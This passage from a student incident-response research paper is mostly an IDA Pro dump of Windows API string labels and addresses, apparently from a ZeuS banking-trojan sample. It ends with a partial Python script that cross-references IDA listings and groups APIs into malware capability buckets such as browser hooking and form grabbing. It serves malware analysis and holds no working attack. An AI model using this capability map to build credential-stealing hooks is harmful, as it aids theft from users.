aOlecreatefro_0 00419CAC aOlecreatefromd 00419CC0

aOlecreatefro_1 00419CD4

aOlecreateex 00419CE8

aRegopenkeyw 0041D2D8

aRegopenkeyex_0 0041D2E4 aRegopenkeyexa 0041D2F4

aRegopenkeya 0041D304

aRegnotifychang 0041D310 aRegloadkeyw 0041D328

aRegloadkeya 0041D334

aReggetkeysecur 0041D340 aRegflushkey 0041D354

aRegenumvaluew 0041D360

aRegenumvaluea 0041D370 aRegenumkeyw 0041D380

aRegenumkeyex_0 0041D38C

aRegenumkeyexa 0041D39C aRegenumkeya 0041D3AC

aRegdeleteval_0 0041D3B8

aRegdeleteval_1 0041D3C8 aRegdeletekeyw 0041D3D8

aRegdeletekeya 0041D3E8

aRegcreatekeyw 0041D3F8

aRegcreatekey_1 0041D408

aRegcreatekey_2 0041D418

aRegcreatekeya 0041D428 aRegconnectregi 0041D438

aRegconnectre_0 0041D44C

aRegclosekey_0 0041D460 aReadeventlogw 0041D46C

aReadeventloga 0041D47C

aQueryservicest 0041D48C aQueryserviceob 0041D4A0

aQueryservicelo 0041D4BC

aQueryservice_0 0041D4D4 aQueryserviceco 0041D4EC

aQueryservice_1 0041D500

aPrivilegedserv 0041D514 aPrivilegedse_0 0041D534

aPrivilegecheck 0041D554

aOpenthreadtoke 0041D564 aOpenservicew 0041D574

aOpenservicea 0041D584

aOpenscmanagerw 0041D594 aOpenscmanagera 0041D5A4

aOpenprocesst_0 0041D5B4

aOpeneventlogw 0041D5C8 aOpeneventloga 0041D5D8

aOpenbackupeven 0041D5E8

aOpenbackupev_0 0041D5FC aObjectprivileg 0041D610

aObjectprivil_0 0041D62C

aObjectopenaudi 0041D648 aObjectopenau_0 0041D660

aObjectdeleteau 0041D678 aObjectdelete_0 0041D690

aObjectcloseaud 0041D6A8

aObjectclosea_0 0041D6C0 aNotifychangeev 0041D6D8

aNotifybootconf 0041D6F0

aMapgenericmask 0041D708

aMakeselfrelati 0041D718

aMakeabsolutesd 0041D72C

aLookupsecurity 0041D73C aLookupsecuri_0 0041D75C

aLookupprivil_0 0041D77C

aLookupprivil_1 0041D794 aLookupprivil_2 0041D7AC

aLookupprivil_3 0041D7C4

aLookupprivil_4 0041D7DC aLookupprivil_5 0041D7F8

aLookupaccoun_0 0041D814

aLookupaccoun_1 0041D828

aGetsystemtimea 00420F84

aGetsystemtim_0 00420F9C aGetsystemtim_1 00420FB4

aGetsystempower 00420FC4

aGetsysteminfo 00420FDC aGetsystemdirec 00420FEC

aGetsystemdir_0 00421000

aGetsystemdefau 00421014 aGetsystemdef_0 0042102C

aGetstringtypew 00421044

aGetstringtypee 00421054 aGetstringtyp_0 00421068

aGetstringtypea 0042107C

aGetstdhandle 0042108C aGetstartupinfo 0042109C

aGetstartupin_0 004210AC

aGetshortpathna 004210BC aGetshortpath_0 004210D0

aGetqueuedcompl 004210E4

aGetprofilestri 00421100

aGetprofilest_0 00421114

aGetprofilesect 00421128

aGetprofilese_0 0042113C aGetprofileintw 00421150

aGetprofileinta 00421160

aGetprocesswork 00421170 aGetprocessvers 0042118C

aGetprocessti_0 004211A0

aGetprocessshut 004211B0 aGetprocessprio 004211D0

aGetprocesshe_0 004211E8

aGetprocesshe_1 004211F8 aGetprocessaffi 00421208

aGetprocaddre_0 00421220

aGetprivatepr_0 00421230 aGetprivatepr_1 0042124C

aGetprivatepr_2 00421268

aGetprivatepr_3 00421284 aGetprivatepr_4 004212A0

aGetprivatepr_5 004212BC

aGetprivatepr_6 004212DC aGetprivatepr_7 004212FC

aGetprivateprof 00421318

aGetprivatepr_8 00421330 aGetprioritycla 00421348

aGetoverlappe_0 0042135C

aGetoemcp 00421370 aGetnumberofcon 0042137C

aGetnumberofc_0 0042139C

aGetnumberforma 004213BC aGetnumberfor_0 004213D0

aGetnamedpipein 004213E4 aGetnamedpipeha 004213F8

aGetnamedpipe_0 00421414

aGetmodulehan_0 00421430 aGetmodulehan_1 00421444

aGetmodulefil_2 00421458

aGetmodulefil_3 0042146C

aGetmailslotinf 00421480

aGetlongpathnam 00421490

aGetlongpathn_0 004214A4 aGetlogicaldr_0 004214B8

aGetlogicaldr_1 004214CC

aGetlogicaldr_2 004214E4 aGetlocaleinfow 004214FC

aGetlocaleinfoa 0042150C

aGetlocaltime_0 0042151C aGetlasterror_0 0042152C

aGetlargestcons 0042153C

aGethandleinfor 00421558

Page 71: CIS 6395 Incident Response Technologies How effective are ...kerkvlietkj.com/UCF/6395/CIS_6395_Personal_Research_Project_Kevin... · CIS 6395 Incident Response Technologies How effective

aOlecreateembed 00419CF4

aOlecreatedefau 00419D10 aOlecreate 00419D28

aOleconvertoles 00419D34

aOleconvertol_0 00419D54 aOleconvertisto 00419D74

aOleconvertis_0 00419D94

aOlebuildversio 00419DB4 aMonikerrelativ 00419DC4

aMonikercommonp 00419DDC

aMkparsedisplay 00419DF4 aIsequalguid 00419E08

aIsaccelerator 00419E14

aIidfromstring 00419E24 aGetrunningobje 00419E34

aGethookinterfa 00419E4C

aGethglobalfrom 00419E60 aGethglobalfr_0 00419E78

aGetdocumentbit 00419E94

aGetconvertstg 00419EA8

aGetclassfile 00419EB8

aFreepropvarian 00419EC8

aEnablehookobje 00419EE0 aDodragdrop 00419EF4

aDlldebugobject 00419F00

aCreatestreamon 00419F18 aCreatepointerm 00419F30

aCreateoleadvis 00419F48

aCreateobjrefmo 00419F60 aCreateitemmoni 00419F74

aCreateilockbyt 00419F88

aCreategenericc 00419FA4 aCreatefilemoni 00419FBC

aCreatedatacach 00419FD0

aCreatedataadvi 00419FE0 aCreateclassmon 00419FF8

aCreatebindctx 0041A00C

aCreateantimoni 0041A01C aCounmarshalint 0041A030

aCounmarshalhre 0041A048

aCouninitialize 0041A05C aCotreatasclass 0041A06C

aCotaskmemreall 0041A07C

aCotaskmemfree 0041A090 aCotaskmemalloc 0041A0A0

aCoswitchcallco 0041A0B0

aCosuspendclass 0041A0C4 aCosetproxyblan 0041A0DC

aCorevokemalloc 0041A0F0

aCorevokeclasso 0041A104 aCoreverttoself 0041A118

aCoresumeclasso 0041A128 aCoreleaseserve 0041A140

aCoreleasemarsh 0041A158

aCoregistersurr 0041A170 aCoregisterpscl 0041A184

aCoregistermess 0041A198

aCoregistermall 0041A1B0

aCoregisterclas 0041A1C4

aCoregisterchan 0041A1DC

aCoqueryrelease 0041A1F4 aCoqueryproxybl 0041A20C

aCoqueryclientb 0041A220

aCoqueryauthent 0041A238 aComarshalinter 0041A258

aComarshalint_0 0041A26C

aComarshalhresu 0041A294 aColockobjectex 0041A2A8

aColoadlibrary 0041A2C0

aCoisole1class 0041A2D0

aLookupaccountn 0041D83C

aLookupaccoun_2 0041D850 aLogonuserw 0041D864

aLogonusera 0041D870

aLockservicedat 0041D87C aIsvalidsid 0041D890

aIsvalidsecurit 0041D89C

aIsvalidacl 0041D8B8 aIstextunicode 0041D8C4

aInitiatesystem 0041D8D4

aInitiatesyst_0 0041D8EC aInitializesid 0041D904

aInitializese_0 0041D914

aInitializeacl 0041D934 aImpersonatesel 0041D944

aImpersonatenam 0041D954

aImpersonatelog 0041D970 aGetusernamew_0 0041D988

aGetusernamea 0041D998

aGettrusteetype 0041D9A8

aGettrusteety_0 0041D9B8

aGettrusteename 0041D9C8

aGettrusteena_0 0041D9D8 aGettokeninfo_0 0041D9E8

aGetsidsubautho 0041D9FC

aGetsidsubaut_0 0041DA14 aGetsidlengthre 0041DA28

aGetsididentifi 0041DA40

aGetservicekeyn 0041DA5C aGetserviceke_0 0041DA70

aGetservicedisp 0041DA84

aGetservicedi_0 0041DA9C aGetsecurityinf 0041DAB4

aGetsecurityi_0 0041DAC8

aGetsecurityi_1 0041DADC aGetsecuritydes 0041DAEC

aGetsecurityd_0 0041DB08

aGetsecurityd_1 0041DB24 aGetsecurityd_2 0041DB40

aGetsecurityd_3 0041DB5C

aGetsecurityd_4 0041DB78 aGetprivateobje 0041DB98

aGetoverlappeda 0041DBB4

aGetoldestevent 0041DBD0 aGetnumberofeve 0041DBE8

aGetnamedsecuri 0041DC04

aGetnamedsecu_0 0041DC1C aGetnamedsecu_1 0041DC34

aGetnamedsecu_2 0041DC4C

aGetmultipletru 0041DC64 aGetmultiplet_0 0041DC78

aGetmultiplet_1 0041DC98 aGetmultiplet_2 0041DCB8

aGetlengthsid 0041DCCC

aGetkernelobjec 0041DCDC aGetfilesecurit 0041DCF4

aGetfilesecur_0 0041DD08

aGetexplicitent 0041DD1C

aGetexplicite_0 0041DD38

aGeteffectiveri 0041DD54

aGeteffective_0 0041DD70 aGetcurrenthwpr 0041DD8C

aGetcurrenthw_0 0041DDA4

aGetauditedperm 0041DDBC aGetauditedpe_0 0041DDDC

aGetaclinformat 0041DDFC

aGetace 0041DE10 aGetaccesspermi 0041DE18

aGetaccessper_0 0041DE38

aFreesid 0041DE58

aGetfullpathnam 00421570

aGetfullpathn_0 00421584 aGetfiletype 00421598

aGetfiletime_0 004215A4

aGetfilesize_0 004215B0 aGetfileinfor_0 004215BC

aGetfileattri_0 004215D8

aGetfileattri_1 004215EC aGetfileattri_2 00421604

aGetfileattri_3 0042161C

aGetexitcodethr 00421630 aGetexitcodep_0 00421644

aGetenvironme_1 00421658

aGetenvironme_2 00421670 aGetenvironment 00421688

aGetenvironme_3 004216A0

aGetenvironme_4 004216B8 aGetdrivetype_0 004216D0

aGetdrivetypea 004216E0

aGetdiskfreespa 004216F0

aGetdiskfrees_0 00421704

aGetdiskfrees_1 00421718

aGetdiskfrees_2 0042172C aGetdevicepower 00421740

aGetdefaultcomm 00421754

aGetdefaultco_0 0042176C aGetdateformatw 00421784

aGetdateformata 00421794

aGetcurrentth_1 004217A4 aGetcurrentth_2 004217B8

aGetcurrentpr_0 004217CC

aGetcurrentpr_1 004217E0 aGetcurrentdire 004217F4

aGetcurrentdi_0 0042180C

aGetcurrencyfor 00421824 aGetcurrencyf_0 00421838

aGetconsoletitl 0042184C

aGetconsoleti_0 00421860 aGetconsolescre 00421874

aGetconsoleoutp 00421890

aGetconsolemode 004218A4 aGetconsolecurs 004218B4

aGetconsolecp 004218CC

aGetcomputern_0 004218DC aGetcomputern_1 004218F0

aGetcompressedf 00421904

aGetcompresse_0 0042191C aGetcommandli_0 00421934

aGetcommandli_1 00421944

aGetcommtimeout 00421954 aGetcommstate 00421964

aGetcommpropert 00421974 aGetcommmodemst 00421988

aGetcommmask 0042199C

aGetcommconfig 004219A8 aGetcalendarinf 004219B8

aGetcalendari_0 004219CC

aGetcpinfoexw 004219E0

aGetcpinfoexa 004219F0

aGetcpinfo 00421A00

aGetbinarytypew 00421A0C aGetbinarytypea 00421A1C

aGetbinarytype 00421A2C

aGetatomnamew 00421A3C aGetatomnamea 00421A4C

aGetacp 00421A5C

aGenerateconsol 00421A64 aFreeresource 00421A80

aFreelibraryand 00421A90

aFreelibrary_0 00421AAC

Page 72: CIS 6395 Incident Response Technologies How effective are ...kerkvlietkj.com/UCF/6395/CIS_6395_Personal_Research_Project_Kevin... · CIS 6395 Incident Response Technologies How effective

aCoishandlercon 0041A2E0

aCoinitializese 0041A2F8 aCoinitializeex 0041A310

aCoinitialize 0041A320

aCoimpersonatec 0041A330 aCogettreatascl 0041A344

aCogetstandardm 0041A358

aCogetpsclsid 0041A370 aCogetobject 0041A380

aCogetmarshalsi 0041A38C

aCogetmalloc 0041A3A0 aCogetinterface 0041A3AC

aCogetinstancef 0041A3CC

aCogetinstanc_0 0041A3E8 aCogetcurrentpr 0041A400

aCogetcurrentlo 0041A414

aCogetclassobje 0041A430 aCogetcallertid 0041A444

aCogetcallconte 0041A454

aCofreeunusedli 0041A468

aCofreelibrary 0041A480

aCofreealllibra 0041A490

aCofiletimetodo 0041A4A4 aCofiletimenow 0041A4BC

aCodosdatetimet 0041A4CC

aCodisconnectob 0041A4E4 aCocreateinst_0 0041A4F8

aCocreateinst_1 0041A50C

aCocreateguid 0041A520 aCocreatefreeth 0041A530

aCocopyproxy 0041A550

aCobuildversion 0041A55C aCoaddrefserver 0041A56C

aClsidfromstr_0 0041A584

aClsidfromprogi 0041A594 aBindmoniker 0041A5A4

aWindowfrompoin 0041A5B0

aWindowfromdc 0041A5C0 aWinhelpw 0041A5D0

aWinhelpa 0041A5DC

aWaitmessage 0041A5E8 aWaitforinputid 0041A5F4

aWinnlsgetimeho 0041A608

aWinnlsgetenabl 0041A61C aWinnlsenableim 0041A634

aVkkeyscanw 0041A644

aVkkeyscanexw 0041A650 aVkkeyscanexa 0041A660

aVkkeyscana 0041A670

aValidatergn 0041A67C aValidaterect 0041A688

aUpdatewindow 0041A698 aUnregisterhotk 0041A6A8

aUnregisterdevi 0041A6BC

aUnregisterclas 0041A6DC aUnregistercl_0 0041A6F0

aUnpackddelpara 0041A704

aUnloadkeyboard 0041A714

aUnionrect 0041A72C

aUnhookwindowsh 0041A738

aUnhookwindow_0 0041A74C aUnhookwinevent 0041A760

aTranslatemes_0 0041A770

aTranslatemdisy 0041A784 aTranslateaccel 0041A79C

aTranslateacc_0 0041A7B4

aTranslateacc_1 0041A7CC aTrackpopupmenu 0041A7E4

aTrackpopupme_0 0041A7F8

aTrackmouseeven 0041A808

aFindfirstfreea 0041DE60

aEqualsid 0041DE74 aEqualprefixsid 0041DE80

aEnumservicesst 0041DE90

aEnumservices_0 0041DEA4 aEnumdependents 0041DEB8

aEnumdependen_0 0041DED0

aDuplicatetok_0 0041DEE8 aDuplicatetok_1 0041DEFC

aDestroyprivate 0041DF0C

aDeregistereven 0041DF2C aDeleteservice 0041DF44

aDeleteace 0041DF54

aCryptverifysig 0041DF60 aCryptverifys_0 0041DF78

aCryptsignhashw 0041DF90

aCryptsignhasha 0041DFA0 aCryptsetprovid 0041DFB0

aCryptsetprov_0 0041DFC4

aCryptsetprov_1 0041DFD8

aCryptsetprov_2 0041DFEC

aCryptsetprovpa 0041E000

aCryptsetkeypar 0041E014 aCryptsethashpa 0041E028

aCryptrelease_0 0041E03C

aCryptimportkey 0041E050 aCrypthashsessi 0041E060

aCrypthashdat_0 0041E074

aCryptgetuserke 0041E084 aCryptgetprovpa 0041E094

aCryptgetkeypar 0041E0A8

aCryptgethash_0 0041E0BC aCryptgetdefaul 0041E0D0

aCryptgetdefa_0 0041E0EC

aCryptgenrandom 0041E108 aCryptgenkey 0041E118

aCryptexportkey 0041E124

aCryptenumprovi 0041E134 aCryptenumpro_0 0041E148

aCryptenumpro_1 0041E15C

aCryptenumpro_2 0041E174 aCryptencrypt 0041E18C

aCryptduplicate 0041E19C

aCryptduplica_0 0041E1B0 aCryptdestroyke 0041E1C4

aCryptdestroy_0 0041E1D4

aCryptderivekey 0041E1E8 aCryptdecrypt 0041E1F8

aCryptcreateh_0 0041E208

aCryptcontextad 0041E218 aCryptacquire_0 0041E22C

aCryptacquire_1 0041E244 aCreateservicew 0041E25C

aCreateservicea 0041E26C

aCreateproces_0 0041E27C aCreateproces_1 0041E294

aCreateprivateo 0041E2AC

aCopysid 0041E2C8

aConvertsecurit 0041E2D0

aConvertsecur_0 0041E2F4

aConvertsecur_1 0041E31C aConvertsecur_2 0041E344

aConvertaccesst 0041E368

aConvertacces_0 0041E38C aControlservice 0041E3B0

aCloseserviceha 0041E3C0

aCloseeventlog 0041E3D4 aCleareventlogw 0041E3E4

aCleareventloga 0041E3F4

aChangeservicec 0041E404

aFreeenvironmen 00421AB8

aFreeenvironm_0 00421AD0 aFreeconsole 00421AE8

aFormatmessag_0 00421AF4

aFormatmessagea 00421B04 aFoldstringw 00421B14

aFoldstringa 00421B20

aFlushviewoffil 00421B2C aFlushinstructi 00421B3C

aFlushfilebuf_0 00421B54

aFlushconsolein 00421B68 aFindresource_0 00421B80

aFindresourceex 00421B90

aFindresource_1 00421BA0 aFindresourcea 00421BB0

aFindnextfile_0 00421BC0

aFindnextfilea 00421BD0 aFindnextchange 00421BE0

aFindfirstfil_0 00421BFC

aFindfirstfilee 00421C0C

aFindfirstfil_1 00421C20

aFindfirstfilea 00421C34

aFindfirstchang 00421C44 aFindfirstcha_0 00421C64

aFindclosechang 00421C84

aFindclose_0 00421CA0 aFindatomw 00421CAC

aFindatoma 00421CB8

aFillconsoleout 00421CC4 aFillconsoleo_0 00421CE0

aFillconsoleo_1 00421CFC

aFiletimetosyst 00421D18 aFiletimetolo_0 00421D30

aFiletimetodo_0 00421D48

aFatalexit 00421D60 aFatalappexitw 00421D6C

aFatalappexita 00421D7C

aExpandenviro_0 00421D8C aExpandenviro_1 00421DA8

aExitprocess_0 00421DC4

aEscapecommfunc 00421DD0 aErasetape 00421DE4

aEnumtimeformat 00421DF0

aEnumtimeform_0 00421E04 aEnumsystemloca 00421E18

aEnumsystemlo_0 00421E2C

aEnumsystemcode 00421E40 aEnumsystemco_0 00421E58

aEnumresourcety 00421E70

aEnumresource_0 00421E84 aEnumresourcena 00421E98

aEnumresource_1 00421EAC aEnumresourcela 00421EC0

aEnumresource_2 00421ED8

aEnumdateform_0 00421EF0 aEnumdateform_1 00421F04

aEnumdateformat 00421F18

aEnumdateform_2 00421F2C

aEnumcalendarin 00421F40

aEnumcalendar_0 00421F54

aEnumcalendar_1 00421F68 aEnumcalendar_2 00421F7C

aEndupdateresou 00421F90

aEndupdateres_0 00421FA4 aDuplicatehandl 00421FB8

aDosdatetimetof 00421FC8

aDisconnectna_0 00421FE0 aDisablethreadl 00421FF4

aDeviceiocontro 00422010

aDeletefilew_0 00422020


aTounicodeex 0041A818

aTounicode_0 0041A824 aToasciiex 0041A830

aToascii 0041A83C

aTilewindows 0041A844 aTilechildwindo 0041A850

aTabbedtextoutw 0041A864

aTabbedtextouta 0041A874 aSystemparamete 0041A884

aSystemparame_0 0041A89C

aSwitchtothiswi 0041A8B4 aSwitchdesktop 0041A8C8

aSwapmousebutto 0041A8D8

aSubtractrect 0041A8E8 aShowwindowasyn 0041A8F8

aShowwindow 0041A908

aShowscrollbar 0041A914 aHowownedpopups 0041A925

aShowcursor 0041A934

aShowcaret 0041A940

aSetwindowshook 0041A94C

aSetwindowsho_0 0041A95C

aSetwindowsho_1 0041A970 aSetwindowsho_2 0041A984

aSetwindowword 0041A994

aSetwindowtextw 0041A9A4 aSetwindowtexta 0041A9B4

aSetwindowrgn 0041A9C4

aSetwindowpos 0041A9D4 aSetwindowplace 0041A9E4

aSetwindowlongw 0041A9F8

aSetwindowlonga 0041AA08 aSetwindowconte 0041AA18

aSetwineventhoo 0041AA30

aSetuserobjects 0041AA40 aSetuserobjecti 0041AA58

aSetuserobjec_0 0041AA74

aSettimer 0041AA90 aSetthreaddes_0 0041AA9C

aSetsystemcurso 0041AAB0

aSetsyscolors 0041AAC0 aSetshellwindow 0041AAD0

aSetscrollrange 0041AAE0

aEtscrollpos 0041AAF1 aSetscrollinfo 0041AB00

aSetrectempty 0041AB10

aSetrect 0041AB20 aSetpropw 0041AB28

aSetpropa 0041AB34

aSetprocesswi_0 0041AB40 aEtprocessdefau 0041AB59

aSetparent 0041AB70 aSetmessagequeu 0041AB7C

aSetmessageextr 0041AB8C

aSetmenuiteminf 0041ABA0 aEtmenuiteminfo 0041ABB5

aSetmenuitembit 0041ABC8

aSetmenuinfo 0041ABDC

aSetmenudefault 0041ABE8

aSetmenucontext 0041ABFC

aSetmenu 0041AC14 aSetlasterrorex 0041AC1C

aSetkeyboardsta 0041AC2C

aSetforegroundw 0041AC40 aSetfocus 0041AC54

aSetdoubleclick 0041AC60

aSetdlgitemtext 0041AC74 aSetdlgitemte_0 0041AC84

aSetdlgitemint 0041AC94

aSetdeskwallpap 0041ACA4

aChangeservic_0 0041E41C

aCanceloverlapp 0041E434 aBuildtrusteewi 0041E44C

aBuildtrustee_0 0041E464

aBuildtrustee_1 0041E47C aBuildtrustee_2 0041E494

aBuildsecurityd 0041E4AC

aBuildsecurit_0 0041E4C8 aBuildimpersona 0041E4E4

aBuildimperso_0 0041E500

aBuildimperso_1 0041E51C aBuildimperso_2 0041E544

aBuildexplicita 0041E56C

aBuildexplici_0 0041E58C aBackupeventlog 0041E5AC

aBackupeventl_0 0041E5BC

aAreanyaccesses 0041E5CC aAreallaccesses 0041E5E4

aAllocatelocall 0041E5FC

aAllocateandini 0041E614

aAdjusttokenp_0 0041E630

aAdjusttokengro 0041E648

aAddauditaccess 0041E65C aAddace 0041E670

aAddaccessdenie 0041E678

aAddaccessallow 0041E68C aAccesscheckand 0041E6A0

aAccesschecka_0 0041E6BC

aAccesscheck 0041E6D8 aAbortsystemshu 0041E6E4

aAbortsystems_0 0041E6FC

aWvnsprintfw_0 0041E714 aWvnsprintfa_0 0041E720

aWnsprintfw_0 0041E72C

aWnsprintfa_0 0041E738 aUrlunescapew 0041E744

aUrlunescapea 0041E754

aUrlisw 0041E764 aUrlisopaquew 0041E76C

aUrlisopaquea 0041E77C

aUrlisnohistory 0041E78C aUrlisnohisto_0 0041E79C

aUrlisa 0041E7AC

aUrlhashw 0041E7B4 aUrlhasha 0041E7C0

aUrlgetpartw 0041E7CC

aUrlgetparta 0041E7D8 aUrlgetlocation 0041E7E4

aUrlgetlocati_0 0041E7F4

aUrlescapew 0041E804 aUrlescapea 0041E810

aUrlcreatefromp 0041E81C aUrlcreatefro_0 0041E830

aUrlcomparew 0041E844

aUrlcomparea 0041E850 aUrlcombinew 0041E85C

aUrlcombinea 0041E868

aUrlcanonicaliz 0041E874

aUrlcanonical_0 0041E888

aUrlapplyscheme 0041E89C

aUrlapplysche_0 0041E8AC aStrtrimw 0041E8BC

aStrtrima 0041E8C8

aStrtointw 0041E8D4 aStrtointexw 0041E8E0

aStrtointexa 0041E8EC

aStrtointa 0041E8F8 aStrstrw_0 0041E904

aStrstriw 0041E90C

aStrstria_0 0041E918

aDeletefilea 0042202C

aDeletefiber 00422038 aDeleteatom 00422044

aDefinedosdevic 00422050

aDefinedosdev_0 00422064 aDebugbreak 00422078

aDebugactivepro 00422084

aCreatewaitable 00422098 aCreatewaitab_0 004220B0

aCreatetoolhe_0 004220C8

aCreatethread_0 004220E4 aCreatetapepart 004220F4

aCreatesemaphor 00422108

aCreatesemaph_0 0042211C aCreateremote_0 00422130

aCreateproces_2 00422144

aCreateproces_3 00422154 aCreatepipe 00422164

aCreatenamedp_0 00422170

aCreatenamedp_1 00422184

aCreatemutexw_0 00422198

aCreatemutexa 004221A8

aCreatemailslot 004221B8 aCreatemailsl_0 004221C8

aCreateiocomple 004221D8

aCreatefilew_0 004221F0 aCreatefilema_0 004221FC

aCreatefilema_1 00422210

aCreatefilea 00422224 aCreatefiber 00422230

aCreateeventw_0 0042223C

aCreateeventa 0042224C aCreatedirect_0 0042225C

aCreatedirect_1 00422270

aCreatedirect_2 00422284 aCreatedirect_3 00422298

aCreateconsoles 004222AC

aCopyfilew_0 004222C8 aCopyfileexw 004222D4

aCopyfileexa 004222E0

aCopyfilea 004222EC aConvertthreadt 004222F8

aConvertdefault 00422310

aContinuedebuge 00422328 aConnectnamed_0 0042233C

aComparestringw 00422350

aComparestringa 00422360 aComparefiletim 00422370

aCommconfigdial 00422380

aCommconfigdi_0 00422394 aClosehandle_0 004223A8

aClearcommerror 004223B4 aClearcommbreak 004223C4

aCancelwaitable 004223D4

aCancelio 004223E8 aCanceldevicewa 004223F4

aCallnamedpipew 00422410

aCallnamedpipea 00422420

aBuildcommdcbw 00422430

aBuildcommdcban 00422440

aBuildcommdcb_0 0042245C aBuildcommdcba 00422478

aBeginupdateres 00422488

aBeginupdater_0 004224A0 aBeep 004224B8

aBackupwrite 004224C0

aBackupseek 004224CC aBackupread 004224D8

aArefileapisans 004224E4

aAllocconsole 004224F4


aSetdebugerrorl 0041ACB8

aSetcursorpos 0041ACCC aSetcursor 0041ACDC

aSetclipboardvi 0041ACE8

aSetclipboardda 0041ACFC aSetclassword 0041AD10

aSetclasslongw 0041AD20

aSetclasslonga 0041AD30 aSetcaretpos 0041AD40

aSetcaretblinkt 0041AD4C

aSetcapture 0041AD60 aSetactivewindo 0041AD6C

aSendnotifymess 0041AD7C

aSendnotifyme_0 0041AD90 aSendmessagew_0 0041ADA4

aSendmessagetim 0041ADB4

aSendmessaget_0 0041ADC8 aSendmessagecal 0041ADDC

aSendmessagec_0 0041ADF4

aSendmessagea 0041AE0C

aSendinput 0041AE1C

aSendimemessage 0041AE28

aSendimemessa_0 0041AE3C aSenddlgitemmes 0041AE50

aSenddlgitemm_0 0041AE64

aScrollwindowex 0041AE78 aScrollwindow 0041AE88

aScrolldc 0041AE98

aScreentoclient 0041AEA4 aReuseddelparam 0041AEB4

aReplymessage 0041AEC4

aRemovepropw 0041AED4 aRemovepropa 0041AEE0

aRemovemenu 0041AEEC

aReleasedc 0041AEF8 aReleasecapture 0041AF04

aRegisterwindow 0041AF14

aRegisterwind_0 0041AF2C aRegisterhotkey 0041AF44

aRegisterdevice 0041AF54

aRegisterdevi_0 0041AF70 aRegisterclipbo 0041AF8C

aRegisterclip_0 0041AFA8

aRegisterclassw 0041AFC4 aRegisterclasse 0041AFD4

aRegisterclas_0 0041AFE8

aRegisterclassa 0041AFFC aRedrawwindow 0041B00C

aRealgetwindowc 0041B01C

aRealchildwindo 0041B030 aPtinrect 0041B04C

aPostthreadmess 0041B058 aPostthreadme_0 0041B06C

aStrstra 0041E924

aStrspnw 0041E92C aStrspna 0041E934

aStrrettostrw 0041E93C

aStrrettostra 0041E94C aStrrettobufw 0041E95C

aStrrettobufa 0041E96C

aStrrstriw 0041E97C aStrrstria 0041E988

aStrrchrw 0041E994

aStrrchriw 0041E9A0 aStrrchria 0041E9AC

aStrrchra 0041E9B8

aStrpbrkw 0041E9C4 aStrpbrka 0041E9D0

aStrncatw 0041E9DC

aStrncata 0041E9E8 aStrisintlequal 0041E9F4

aStrisintlequ_0 0041EA04

aStrfromtimeint 0041EA14

aStrfromtimei_0 0041EA2C

aStrformatkbsiz 0041EA44

aStrformatkbs_0 0041EA58 aStrformatbytes 0041EA6C

aStrformatbyt_0 0041EA80

aStrformatbyt_1 0041EA94 aStrdupw 0041EAAC

aStrdupa 0041EAB4

aStrcpyw 0041EABC aStrcpynw 0041EAC4

aStrcmpw 0041EAD0

aStrcmpnw 0041EAD8 aStrcmpniw_0 0041EAE4

aStrcmpnia_0 0041EAF0

aStrcmpna 0041EAFC aStrcmpiw 0041EB08

aStrchrw 0041EB14

aStrchriw 0041EB1C aStrchria 0041EB28

aStrchra 0041EB34

aStrcatw 0041EB3C aStrcatbuffw 0041EB44

aStrcatbuffa 0041EB50

aStrcspnw 0041EB5C aStrcspniw 0041EB68

aStrcspnia 0041EB74

aStrcspna 0041EB80 aShstrdupw 0041EB8C

aShstrdupa 0041EB98

aShskipjunction 0041EBA4 aShsetvaluew 0041EBB4

aShsetvaluea 0041EBC0 aShsetthreadref 0041EBCC

aAddatomw 00422504

aAddatoma 00422510 String1 0042251C

aEntry 00422520

LibFileName 00422528 ProcName 00422538

aDans 0042254C

aRich 00422554 a_text 0042255C

a_rdata 00422564

a_data 0042256C aWritefile_1 00428776

aReadfile_1 00428782

aCreatefilew_1 0042878C aOpenmutexw_1 0042879A

aSetnamedpipe_1 004287A6

aHeaprealloc_0 004287C0 aMultibytetow_1 0042885C

aGetfilesizee_0 00428872

aCreatefilema_2 00428882

aSetfileattri_2 00428896

aCreatethread_1 004288AA

aClosehandle_1 004288B8 aSleep_1 004288C6

aGetmodulehan_2 004288CE

aLoadlibrarya_1 004288E0 aGetprocaddre_1 004288EE

aGetmodulefil_4 004288FE

aExitprocess_1 00428912 aLstrcmpia_1 00428920

aLstrcpyw_1 0042892C

aWidechartomu_1 00428936 aDeletefilew_1 0042894C

aCrypthashdat_1 0042895A

aCryptdestroy_1 0042896A aCryptcreateh_1 0042897C

aCryptgethash_1 0042898E

aCryptrelease_1 004289A2 aCryptacquire_2 004289B8

aGetsavefilenam 004289CE

aGetopenfilenam 004289E0 aOleinitializ_0 004289F2

aPathremovefi_2 00428A2C

aPathfindfile_2 00428A60 aPathcombinew_1 00428A74

aGetwindowtex_2 00428A82

aMessageboxw_0 00428A98 aCreatedialog_2 00428AFC

aGetdlgitem_1 00428B10

aSetwindowlon_0 00428B1C aGetdlgitemte_3 00428B2C

aS 00429028
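The Names-window dump that ends here and the Strings-window rows that follow describe the same bytes from two angles: IDA's auto-names are truncated (aCryptacquire_0 tells you little), while the strings rows carry the full text, its address and its size. The following Python is an added example, not code from the paper or from the ZeuS kit. It parses both row formats as they appear on this page, checks IDA's size column against the decoded string (the count includes the NUL terminator, and the listing shows C escapes such as backslash-n), resolves truncated auto-names to the full string at the same address, and groups known API and library names into coarse capability buckets. The capability map and its labels are the editor's own heuristic, not a published signature; the sample rows are copied from this page's listing.

```python
"""Cross-reference and triage IDA string listings (added example).

Row formats handled, matching the listings on this page:
  Names window  : aCryptacquire_0 0041E22C aCryptacquire_1 0041E244
  Strings window: .text:0041E22C 00000015 C CryptAcquireContextW
The CAPABILITIES map is an analyst's heuristic grouping, not ZeuS's own data.
"""
import re
from collections import defaultdict

# One Strings-window row: segment:address size type text
STRING_ROW = re.compile(
    r"^(?P<seg>\.\w+):(?P<addr>[0-9A-F]{8})\s+(?P<size>[0-9A-F]{8})\s+"
    r"(?P<kind>\w+)\s+(?P<text>.*)$"
)
# Names-window rows carry one or two "name address" pairs per line.
NAME_PAIR = re.compile(r"([A-Za-z_]\w*)\s+([0-9A-F]{8})\b")

# Heuristic grouping of names seen in the listing (editor's assumption).
CAPABILITIES = {
    "browser hooking / form grabbing": {
        "nspr4.dll", "PR_Write", "PR_GetPeerName", "HttpSendRequestA",
        "HttpSendRequestW", "HttpSendRequestExA", "HttpSendRequestExW",
        "InternetReadFile", "InternetReadFileExA", "InternetReadFileExW",
        "HttpQueryInfoA", "HttpQueryInfoW", "send", "WSASend", "connect",
        "WSAConnect", "closesocket",
    },
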